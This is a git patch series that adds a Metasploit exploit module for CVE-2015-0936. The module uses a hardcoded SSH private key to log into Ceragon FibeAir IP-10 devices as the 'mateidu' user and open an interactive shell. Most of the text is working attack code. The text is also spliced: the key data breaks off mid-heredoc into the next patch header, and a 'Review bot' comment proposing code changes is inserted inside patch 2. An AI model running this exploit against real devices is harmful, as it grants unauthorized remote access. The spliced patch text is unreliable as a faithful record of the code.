From 8ec71e9daf2e1e46539914c8da74522c800c04ec Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Wed, 1 Apr 2015 14:05:41 -0500
Subject: [PATCH 1/3] Add a module for R7-2015-05
---
 .../ssh/ceragon_fibeair_known_privkey.rb | 149 ++++++++++++++++++
 1 file changed, 149 insertions(+)
 create mode 100644 modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
new file mode 100644
index 0000000000..977440e347
--- /dev/null
+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+ include Msf::Auxiliary::Report
+
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(update_info(info, {
+ 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
+ 'Description' => %q{
+ Ceragon ships a public/private key pair on FibeAir IP-10 devices
+ that allows passwordless authentication to any other IP-10 device.
+ Since the key is easily retrievable, an attacker can use it to
+ gain unauthorized remote access as the "mateidu" user.
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => true,
+ 'Targets' => [ [ "Universal", {} ] ],
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find',
+ },
+ },
+ 'Author' => [
+ 'hdm', # Discovery
+ 'todb' # Metasploit module and advisory text (mostly copy-paste)
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-0936'],
+ ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
+ ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
+ ],
+ 'DisclosureDate' => "Apr 01 2015", # Not a joke
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+ 'DefaultTarget' => 0
+ }))
+
+ register_options(
+ [
+ # Since we don't include Tcp, we have to register this manually
+ Opt::RHOST(),
+ Opt::RPORT(22)
+ ], self.class
+ )
+
+ register_advanced_options(
+ [
+ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+ ]
+ )
+
+ end
+
+ # helper methods that normally come from Tcp
+ def rhost
+ datastore['RHOST']
+ end
+ def rport
+ datastore['RPORT']
+ end
+
+ def do_login(user)
+
opt_hash = { + :auth_methods => ['publickey'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :key_data => [ key_data ], + :disable_agent => true, + :config => false, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, user, opt_hash) + end + rescue Rex::ConnectionError + return nil + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return nil + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return nil + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + return nil + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return nil + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + ssh_socket = nil + + return conn + else + return nil + end + end + + def exploit + conn = do_login("mateidu") + if conn + print_good "#{rhost}:#{rport} - Successful login" + handler(conn.lsock) + end + end + + def key_data + < Date: Wed, 1 Apr 2015 14:16:45 -0500 Subject: [PATCH 2/3] Fix reference --- modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 977440e347..d093a8e10a 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb 
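Review bot: `rescue Rex::ConnectionError` in do_login returns nil without printing anything, while every other rescue branch in the same `begin` block reports its failure with `print_error`, so an operator whose connection never completes gets no feedback at all. A matching line, `print_error "#{rhost}:#{rport} SSH - Connection failed"`, before that `return nil` keeps the branches consistent. The `:proxies => datastore['Proxies']` entry reads an option this module never registers — the comment above `Opt::RHOST()` notes Tcp is not mixed in and only RHOST/RPORT are added — so it is nil unless set globally; either register a `Proxies` option next to RHOST/RPORT or drop the key. The method also has no header comment; `# Attempts public-key auth as +user+; returns a Net::SSH::CommandStream on success, nil on any failure` above `def do_login(user)` would document the contract callers rely on. The tail of this hunk (the key_data heredoc body and the closing `end`s) is cut off in this page.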
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 ['CVE', '2015-0936'],
 ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
- ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
+ ['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
 ],
 'DisclosureDate' => "Apr 01 2015", # Not a joke
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
From b17727d244a82726c2d1360548a0d4cdfdaf104d Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Wed, 1 Apr 2015 14:35:45 -0500
Subject: [PATCH 3/3] Switching to privileged => false
---
 modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
index d093a8e10a..04bcf198d2 100644
--- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
- 'Privileged' => true,
+ 'Privileged' => false,
 'Targets' => [ [ "Universal", {} ] ],
 'Payload' =>
 {